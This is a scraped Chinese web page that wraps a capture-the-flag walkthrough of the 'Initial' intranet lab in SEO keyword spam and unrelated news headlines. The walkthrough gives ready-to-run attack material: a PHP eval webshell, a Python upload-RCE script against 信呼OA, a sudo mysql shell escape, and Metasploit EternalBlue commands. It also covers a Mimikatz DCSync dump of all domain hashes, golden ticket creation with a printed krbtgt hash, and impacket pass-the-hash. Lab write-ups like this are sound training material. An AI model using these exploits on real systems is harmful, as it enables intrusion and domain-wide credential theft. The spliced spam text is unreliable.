当前位置: 首页 > news >正文

滨海做网站哪家好源码下载网站cms

滨海做网站哪家好,源码下载网站cms,那个网站做外贸好,做网站怎么去工信部缴费文章目录 春秋云境—Initial一、前期准备1、靶标介绍2、相关设备 二、WEB渗透1、ThinkPHP RCE#xff08;1#xff09;、打开网站#xff08;2#xff09;、检测漏洞 2、蚁剑连接3、sudo提权4、frpc代理5、fsacn扫描 三、后渗透1、信呼OA RCE#xff08;1#xff09;、1.… 文章目录 春秋云境—Initial一、前期准备1、靶标介绍2、相关设备 二、WEB渗透1、ThinkPHP RCE1、打开网站2、检测漏洞 2、蚁剑连接3、sudo提权4、frpc代理5、fsacn扫描 三、后渗透1、信呼OA RCE1、1.php木马2、exp.py漏洞脚本3、查看路径 2、蚁剑连接3、永恒之蓝4、DCSync1、DCSync简介2、导出域内所有用户Hash3、生成黄金票据4、导入黄金票据5、HASH传递 春秋云境—Initial 一、前期准备 1、靶标介绍 Initial是一套难度为简单的靶场环境完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag各部分位于不同的机器上。 2、相关设备 设备名称IP地址Web39.98.120.156172.22.1.15XIAORANG-OA01172.22.1.18XIAORANG-WIN7172.22.1.21DC01172.22.1.2 二、WEB渗透 1、ThinkPHP RCE 1、打开网站 http://39.98.120.156/2、检测漏洞 2、蚁剑连接 3、sudo提权 (www-data:/tmp) $ sudo -l (www-data:/tmp) $ sudo mysql -e \! cat /root/flag/flag01.txt4、frpc代理 (www-data:/var/www/html) $ cd /tmp/ (www-data:/tmp) $ chmod x frpc* (www-data:/tmp) $ ./frpc -c ./frpc.ini5、fsacn扫描 (www-data:/var/www/html) $ cd /tmp/ (www-data:/tmp) $ chmod x fscan (www-data:/tmp) $ ./fscan -h 172.22.1.0/24172.22.1.2:445 open 172.22.1.2:135 open 172.22.1.15:80 open 172.22.1.15:22 open 172.22.1.18:80 open 172.22.1.21:139 open 172.22.1.2:139 open 172.22.1.18:139 open 172.22.1.21:135 open 172.22.1.18:135 open 172.22.1.2:88 open 172.22.1.21:445 open 172.22.1.18:445 open 172.22.1.18:3306 open [] NetInfo: [*]172.22.1.21[-]XIAORANG-WIN7[-]172.22.1.21 [] NetInfo: [*]172.22.1.18[-]XIAORANG-OA01[-]172.22.1.18 [*] WebTitle:http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin [*] 172.22.1.2 []DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393 [] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1) [*] 172.22.1.21 XIAORANG\XIAORANG-WIN7 Windows Server 2008 R2 Enterprise 7601 Service Pack 1 [*] 172.22.1.2 (Windows Server 2016 Datacenter 14393) [] NetInfo: [*]172.22.1.2[-]DC01[-]172.22.1.2 [*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600 [*] WebTitle:http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?mlogin [*] WebTitle:http://172.22.1.18?mlogin code:200 len:4012 title:信呼协同办公系统 [] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1三、后渗透 1、信呼OA RCE 1、1.php木马 ?php eval($_POST[1]);?2、exp.py漏洞脚本 import requestssession requests.session()url_pre http://172.22.1.18/ url1 url_pre ?acheckmlogindajaxbooltruernd533953 url2 url_pre /index.php?aupfilemuploaddpublicmaxsize100ajaxbooltruernd798913 url3 url_pre /task.php?mqcloudCos|runtarunfileid11data1 {rempass: 0,jmpass: false,device: 1625884034525,ltype: 0,adminuser: YWRtaW4,adminpass: YWRtaW4xMjM,yanzm: }r session.post(url1, datadata1) r session.post(url2, files{file: open(1.php, r)})filepath str(r.json()[filepath]) filepath / filepath.split(.uptemp)[0] .php id r.json()[id]url3 url_pre f/task.php?mqcloudCos|runtarunfileid{id}r session.get(url3) r session.get(url_pre filepath ?1system(dir);) print(r.text)3、查看路径 2、蚁剑连接 3、永恒之蓝 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set rhost 172.22.1.21 set proxies socks5:116.196.88.132:6001 exploit 4、DCSync 1、DCSync简介 在DCSync技术没有出现之前攻击者要想拿到域内用户的hash就只能在域控制器上运行 Mimikatz 或 Invoke-Mimikatz去抓取密码hash但是在2015 年 8 月份 Mimkatz新增了一个主要功能叫DCSync使用这项技术可以有效地 “模拟” 域控制器并从目标域控上请求域内用户密码hash。 域控制器DC是 Active Directory(AD) 域的支柱用于管理域内用户。在现实场景中为了防止 DC 崩溃导致连带域内瘫痪会额外布置多台域控制器。当出现了多台域控制器时为了实现数据同步不同域控制器DC之间每 15 分钟都会有一次域数据的同步当 DC1 想从 DC2 获取数据时DC1 会向 DC2 发起GetNCChanges请求该数据包包含需要同步的数据。 DCSync则是通过上述原理利用 Directory Replication ServiceDRS服务的GetNCChanges接口向域发起数据同步请求。 windows 域默认可以运行以下组内用户登陆到域控中 Enterprise Admins (目录林管理员组) Domain Admins(域管理员组) Administrators Backup Operators Account Operators Print Operators如果一个攻击者能够拿下以上组中的一个账户整个活动目录就可能被攻陷因为这些用户组有登陆到域控的权限,除此之外还需要提权到 system 权限。 2、导出域内所有用户Hash load kiwi kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv3、生成黄金票据 meterpreter kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt4、导入黄金票据 kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917-502 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt5、HASH传递 proxychains4 impacket-wmiexec -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator172.22.1.2 type Users\Administrator\flag\flag03.txt
http://www.yutouwan.com/news/501788/

相关文章:

  • 工业皮带怎么做免费的网站社交做的最好的网站
  • 网站怎么制作做正能量网站入口不用下载免费
  • 网站制作项目杜集网站建设
  • 四川交投建设工程股份有限公司网站英文字体设计网站
  • 海原网站建设网站建设经济效益
  • flash个人网站设计高端企业网站建设核心
  • 网站上传的图片怎么做的清晰度有关网站建设的图片
  • 怎么把自己的网站上传到百度wordpress模板选择
  • 河北企业网站设计网站策划书中应包括市场竞争对手的信息
  • 佛山网站制作哪个好薇网页制作实战视频
  • 房子如何上网站做民宿做库房推广哪个网站好
  • 用网站建设与管理创业疾控中心24小时咨询电话
  • 苏州网站制作及推广做水处理药剂的公司网站
  • 网站快速备案濮阳seo外包公司
  • 网站搜索引擎优化主要方法下载建设网站
  • 那曲地区建设局网站软件源码成品资源下载网站
  • 猎头自己在哪个网站做单网站建设英文字体
  • 首席经济学家共议资产前景 慢牛逻辑逐步形成
  • 死了么APP称承受巨大压力 创新路上的坚守与挑战
  • 贵金属“狂飙” 这些骗局要警惕 理性投资防风险
  • 趴地菠菜黄心菜 河南本土蔬菜破圈 互联网助力鲜蔬走红
  • 德国遭遇“黑冰”天气 交通严重受阻
  • 女子轻信“办户口”谎言被骗近18万 骗子已被批捕
  • 俄称“榛树”导弹打瘫乌战机修理厂 重创维修与生产设施
  • 郑州制作网站费用公司网站规划案例
  • 安阳网站建设公司出租车公司深圳网络推广公司哪家好
  • 义乌北苑编程网站开发公司html电影网页制作模板
  • 黑龙江省营商环境建设监督局网站注册公司取名技巧
  • 使用爬虫做的网站电脑做apk的网站h5
  • 怎么做有个捐款的网站深圳网站平台